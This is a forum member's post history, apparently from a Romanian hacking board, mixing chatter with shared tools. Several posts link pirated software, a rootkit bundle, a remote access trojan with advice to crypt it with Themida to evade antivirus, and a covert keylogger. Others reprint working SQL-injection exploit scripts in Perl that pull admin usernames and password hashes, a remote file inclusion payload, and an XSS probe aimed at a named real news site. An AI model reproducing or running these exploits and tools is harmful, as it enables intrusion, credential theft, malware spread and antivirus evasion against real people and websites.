Jump to content

Ras

Active Members
  • Posts

    1106
  • Joined

  • Last visited

  • Days Won

    1

Everything posted by Ras

  1. SpeedMyInternet SpeedMyInternet will improve internet speed connection. Download: http://rapidshare.com/files/31792204/SpeedMyInternet.rar
  2. 1) Start-> Run-> type gpedit.msc ( You will see Local Computer Policy) 2) Expand the Administrative Templates branch 3) Expand the Network tab. 4) Highlight QoS Packet Scheduler 5) click on Limit Reservable Bandwidth 6 Check enabled 7 Change Bandwidth limit % to 0 % click apply and then restart your pc. your internet will be 20% faster. and believe me you will feel it. source: http://www.thetechieblog.net/2007/05/11/how-to-increase-your-internet-speed
  3. Norton Systemworks 2007 Premier Edition Description: Norton SystemWorks 2007 Premier Powerful protection and performance enhancement. Key Features: - Detects and removes viruses and spyware. - Blocks spyware and worms automatically. - Prevents virus-infected emails from spreading. - Finds and removes hidden threats. Download: http://rapidshare.com/files/25657113/ensw07p1.part1.rar http://rapidshare.com/files/25657086/ensw07p1.part2.rar http://rapidshare.com/files/25657144/ensw07p1.part3.rar http://rapidshare.com/files/25657149/ensw07p1.part4.rar http://rapidshare.com/files/25657170/ensw07p1.part5.rar http://rapidshare.com/files/25657047/ensw07p1.part6.rar http://rapidshare.com/files/25657410/ensw07p2.part1.rar http://rapidshare.com/files/25657331/ensw07p2.part2.rar http://rapidshare.com/files/25657321/ensw07p2.part3.rar
  4. ::::::::::::::::::::::::::::::: r00tKiT Windowz All in One ::::::::::::::::::::::::::::::: -AFX Rootkit 2005 -BootRootkit (eEye) -FakeNetstat -Hacker Defender 1.0.0 revisited -He4Hook v2.1.5b6 -NuclearRootkit v1.0 -Vanquish v0.2.1 Download: http://rapidshare.com/files/31789578/rpwa.rar Password: d4rk-r3v-t34m
  5. Ras

    Geez people !

    iti dai seama ca omu' e incepator daca a cerut asa ceva... si inca ceva... mai bine va ganditi cu totii cum erati la inceput cand nu stiati mai nimic... si inca ceva... mereu o sa fie unu mai bun adica unu care sa stie mai multe...
  6. Data topicului: 30 Oct 2006 06:13 am redjoker topicul este ff vechi... atunci inca mai era urbanfriends al lui spiry...
  7. ErrorExpert helps identify and fix errors in the Windows Registry and optimizes the performance of your Computer. Invalid file and system references can cause serious problems with your computer including system failure and frequent crashing. ErrorExpert will scan your computer for these invalid system references and file references. Now almost all computer problems can be resolved easily and automatically! This award winning software also includes advanced utilities that will remove any unnecessary toolbars, popups and unneeded startup items which slow down your computer. Software Highlights * Repairs invalid registry entries that are a common cause of Windows crashes and error messages * Increases system speed and stability by removing invalid references * Scans your hard drive for invalid and incorrect program shortcuts * Cleans and repairs unwanted debris left behind by adware and spyware * Includes Backup and Undo functionality for any change made * Removes Toolbars and software that cause Popups * Includes Browser Helper Object Manager & Startup Program Manager * Uninstall software that cannot be removed from the Control Panel * Virtual Memory Diagnostic and Repair Tool NEW * Works with all Windows Operating systems: 98/ ME/2000/XP/2003/ Vista Download: http://rapidshare.com/files/31233319/ErrorExpert.v1.4.rar
  8. Radiotracker Platinum is an Internet radio recorder and player, that automatically records streaming songs from selected online stations, and saves them as MP3 files to your local hard drive. It automatically adds ID3 tags to your recorded files and also downloads available cover artwork and lyrics along with the songs. In addition to the recording features, Radiotracker Platinum also includes a live radio player and a ringtone converter that can convert your recordings into ringtones for your cell phone. Download: http://rapidshare.com/files/31233210/Radiotracker_Platinum_3.0.1.41.rar
  9. Ras

    Hav-Rat 1.3.0

    nu este nicio problema nemessis. este detectabil pentru unele AV-uri... dar criptati-l cu themida si o sa fie nedetectabil
  10. Evil IP scanner is a very fast and simple program which scans the IPs in the network and lets you know the WINS name, computer name, MAC addresses and the user currently signed in. The program is very fast because it uses separate threads for each scanned address. The very first step is to ping each IP address to check if it's alive, then optional it can resolve the hostname and tries to connect at specified port. Download: http://rapidshare.com/files/31135481/Evil_Ip_Scanner.rar
  11. Hav-Rat 1.3.0 Filemanager ( New and fresh) + Soundmanager(Send and recive sounds) + Screencapture( Made better and with better quility) + Information ( Get info from server ) - Webcam ( Removed for researching a better alternativ) - Pc control( Somethings have been removed ) + Password ( password has been added to server, and a password phrase ) + Settings( All settings are saved in a .ini file) + Firewallbypass ( A nice bypassing method has been added) + Serversize is reduced by 6x. + The server is cryptable - Installed applications ( Removed beacuse i dident think it fullfilled a good function ) Download: http://rapidshare.com/files/31134939/HR1.3.0.zip Password: havalito.com
  12. foarte usor de facut... ne dai mura'n gura... am incercat si eu ... si mi-a iesit http://www.battsboard.com/ Password Hash is: dee29f58e1d7006cc5cbf23f755ab5c3
  13. ca sa gasesti ... iti dau o metoda usoara: -intra pe http://stiri.acasa.ro/ -dai la search si cauti <aaa> -dupa ce dai search pt <aaa> link-ul arata asa http://stiri.acasa.ro/cautare.php?keywords=%3Caaa%3E&all=true&submit=Cauta -in loc de %3Caaa%3E scrii <script>alert('XSS')</script> -link-ul o sa ajunga asa: http://stiri.acasa.ro/cautare.php?keywords=<script>alert('XSS')</script>&all=true&submit=Cauta cein mai bine downloadezi toate tutorialele video facute de slick despre XSS... [de acolo am invatat eu]
  14. poti sa faci un tutorial despre cum sa folosesti un exploit asupra unui site vulnerabil mi se pare interesant si pt cei incepatori ca mine si pt altii
  15. dai dublu click pe .msi ala
  16. cum naiba or face asemenea virusi?
  17. super calumea programul ... l-am picat pe unu in 2 minute dupa ceas :D. nemessis good post
  18. Ras

    Minesweeper

    tu crezi ca jocul asta o sa ajunga pana la ei? jocul ala are copyright? [minesweeper originalul]
  19. #!/usr/bin/perl -w ################################################################################# # # # TaskDriver <= 1.2 Login Bypass/SQL Injection Exploit # # # # Discovered by: Silentz # # Payload: Login Bypass & Admin Username & Hash Retrieval # # Website: [url]http://www.No_Advertising.com[/url] # # # # Vulnerable Code (login.php): # # # # $sql = "SELECT * FROM $userstable WHERE username = '$_POST[username]' AND # # password = md5('$_POST[password]')"; # # # # Vulnerable Code (notes.php): # # # # $taskid = $_GET['taskid']; # # $sql = "SELECT * FROM $taskstable WHERE taskid = '$taskid'"; # # # # PoC: [url]http://victim.com/login.php[/url] # # In username box input: ' OR 1=1 /* # # In password box: [ANYTHING OR NOTHING] # # # # OR: # # # # http://victim.com/notes.php?taskid=-999' UNION SELECT 0,0,username, # # 0,0,0,0,0,0,0,0,0,password FROM users WHERE userlevel='a' /* # # # # Subject To: magic_quotes_gpc set to off # # GoogleDork: Get your own! # # Notes: You can do a UNION INSERT in the password reset form to add an admin # # # # Shoutz: The entire No_Advertising community # # # ################################################################################# use LWP::UserAgent; if (@ARGV < 1){ print "-------------------------------------------------------------------------\r\n"; print " TaskDriver <= 1.2 Login Bypass/SQL Injection Exploit\r\n"; print "-------------------------------------------------------------------------\r\n"; print "Usage: No_Advertising.pl [PATH]\r\n\r\n"; print "[PATH] = Path where TaskDriver is located\r\n\r\n"; print "e.g. No_Advertising.pl http://victim.com/taskdriver/\r\n"; print "-------------------------------------------------------------------------\r\n"; print " http://www.No_Advertising.com\r\n"; print " ...Silentz\r\n"; print "-------------------------------------------------------------------------\r\n"; exit(); } $b = LWP::UserAgent->new() or die "Could not initialize browser\n"; $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); $cookie = "fook%21%27+or+1%3D1+%2F%2A;"; $host = $ARGV[0] . "notes.php?taskid=-999' UNION SELECT 0,0,username,0,0,0,0,0,0,0,0,0,password FROM users WHERE userlevel='a' /*"; my @cookie = ('Cookie' => "auth=$cookie;"); my $res = $b->get($host, @cookie); $answer = $res->content; if ($answer =~ /notes on (.*?)<\/u><\/td><\/tr>/){ print "-------------------------------------------------------------------------\r\n"; print " TaskDriver <= 1.2 Login Bypass/SQL Injection Exploit\r\n"; print "-------------------------------------------------------------------------\r\n"; print "[+] Admin User : $1\n"; } if ($answer =~/([0-9a-fA-F]{32})<\/font>/){ print "[+] Admin Hash : $1\n"; print "-------------------------------------------------------------------------\r\n"; print " http://www.No_Advertising.com\r\n"; print " ...Silentz\r\n"; print "-------------------------------------------------------------------------\r\n"; } # milw0rm.com [2007-05-10]
  20. puteti sa faceti un "buton" prin care noi userii sa putem sa ne stergem topicul/postul? poate am postat la sectiunea gresita sau poate am postat de 2 ori...
  21. Ardamax Keylogger is an invisible keylogger that captures a user's activity and saves it to an encrypted log file. The log file can be stored as a text or web page. Use this keylogger to find out what is happening on your computer while you are away, maintain a backup of your typed data automatically or use it to monitor your kids. Download: http://www.ardamax.com/downloads/setup_akl.exe
  22. ################################################## ## Thyme Calendar 1.3 SQL Vulnerability Exploit ## ## by Warlord ## ################################################## ## codehook.110mb.com ## ################################################## ------------------------------------------------------------------- OVERVIEW AND DEFINITION ------------------------------------------------------------------- A vulnerability in exists in Thyme Calendar 1.3 (and possibly lower versions) which allows execution of a custom SQL query. The vulnerability exists in event_view.php, because the 'eid' field is not properly validated. An attacker could exploit the vulnerabilit with the following request: [url]http://sitename/thyme_directory/event_view.php?eid=34[/url] UNION SELECT userid FROM thyme_Users Where 'sitename' is the name of the site, and 'thyme_directory' is the directory in which Thyme is located. ------------------------------------------------------------------- SQL QUERY ------------------------------------------------------------------- The SQL query originally looks like this: SELECT id FROM thyme_Attachments WHERE eid = 34 But by changing the 'eid' field we get a query that looks like this: SELECT id FROM thyme_Attachments WHERE eid = 34 UNION SELECT userid FROM thyme_Users ------------------------------------------------------------------- RESULT OF NEW QUERY ------------------------------------------------------------------- The result is that the query sends back all the userid's (actually usernames) from the database instead of the 'id' from thyme_Attachments. You will be able to grab the userid's from the HTML source by searching for 'aid=' as this is where the attachment id is supposed to go. For example: [url]http://sitename/thyme_directory/download_attachment.php?aid=admin[/url] ------------------------------------------------------------------- GETTING PASSWORDS ------------------------------------------------------------------- And the password (md5'd) can be obtained in the same fashion: [url]http://sitename/thyme_directory/event_view.php?eid=34[/url] UNION SELECT pass FROM thyme_Users WHERE username = "admin" In the HTML source: [url]http://sitename/thyme_directory/download_attachment.php?aid=9ab1c5afa4946ca0030271736f38c83a[/url] ------------------------------------------------------------------- HOW TO EXPLOIT ------------------------------------------------------------------- Cookies should be modifiable. If not, crack the md5! [url]http://md5.rednoize.com[/url] # milw0rm.com [2007-05-10]
  23. # Original Version 0.11(config.inc.php) Remote File Inclusion Vulnerability # D.Script: [url]http://xanatos.glo.org.mx/bi/original-0.11.tar.bz2[/url] # Discovered by: GolD_M = [Mahmood_ali] # Homepage: [url]http://www.Tryag.Com/cc[/url] # Exploit:[Path]/inc/config.inc.php?x[1]=Shell # Greetz To: Tryag-Team ....** # milw0rm.com [2007-05-10]
  24. hai frate... cat de tampit trebuie sa fie omu ala... tampit e putin spus...
  25. #!/usr/bin/perl -w ################################################################################# # # # TutorialCMS <= 1.00 SQL Injection Exploit # # # # Discovered by: Silentz # # Payload: Admin Username & Hash Retrieval # # Website: [url]http://www.No_Advertising.com[/url] # # # # Vulnerable Code (search.php): # # # # $search = $_REQUEST['search']; # # $sql = "SELECT * FROM tutorials WHERE title LIKE '%$search%' # # ORDER BY hits DESC LIMIT $startID , $perPage"; # # # # Manual SQL Injection: # # # # browseCat.php?catFile=[SQL QUERY] # # browseSubCat.php?catFile=[SQL QUERY] # # openTutorial.php?id=[SQL QUERY] # # search.php?search=[SQL QUERY] # # topFrame.php?id=[SQL QUERY] # # admin/editListing.php?id=[SQL QUERY] # # # # NOTE: All above parameters are vulnerable to XSS, so try: # # # # search.php?search="><script>alert('http://www.No_Advertising.com')</script> # # # # PoC: http://victim.com/search.php?search=' UNION SELECT 0,0,0,0,username, # # password,0,0,0,0,0,0,0 FROM users WHERE id='1' /* # # # # Subject To: magic_quotes_gpc set to off # # GoogleDork: "Powered By Photoshop Tutorials" (0 Results) # # # # Shoutz: The entire No_Advertising community # # # ################################################################################# use LWP::UserAgent; if (@ARGV < 1){ print "-------------------------------------------------------------------------\r\n"; print " TutorialCMS <= 1.00 SQL Injection Exploit\r\n"; print "-------------------------------------------------------------------------\r\n"; print "Usage: No_Advertising.pl [PATH]\r\n\r\n"; print "[PATH] = Path where TutorialCMS is located\r\n\r\n"; print "e.g. No_Advertising.pl http://victim.com/tutorialcms/\r\n"; print "-------------------------------------------------------------------------\r\n"; print " http://www.No_Advertising.com\r\n"; print " ...Silentz\r\n"; print "-------------------------------------------------------------------------\r\n"; exit(); } $useragent = LWP::UserAgent->new() or die "Could not initialize browser\n"; $useragent->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); $sql = $ARGV[0] . "search.php?search=' UNION SELECT 0,0,0,0,username,password,0,0,password,0,password,0,0 FROM users WHERE id='1' /*"; $result = $useragent->request(HTTP::Request->new(GET=>$sql)); if($result->content =~ /">[b]<u>([0-9a-zA-Z]+)<\/u>/){ print "-------------------------------------------------------------------------\r\n"; print " SimpNews <= 2.40.01 SQL Injection Exploit\r\n"; print "-------------------------------------------------------------------------\r\n"; print "[+] Admin User : $1\n"; } else {print "\n[-] Unable to retrieve admin username..."} if($result->content =~ /([0-9a-fA-F]{32})/){ print "[+] Admin Hash : $1\n"; print "-------------------------------------------------------------------------\r\n"; print " http://www.No_Advertising.com\r\n"; print " ...Silentz\r\n"; print "-------------------------------------------------------------------------\r\n"; } else {print "\n[-] Unable to retrieve admin hash...\n";}
×
×
  • Create New...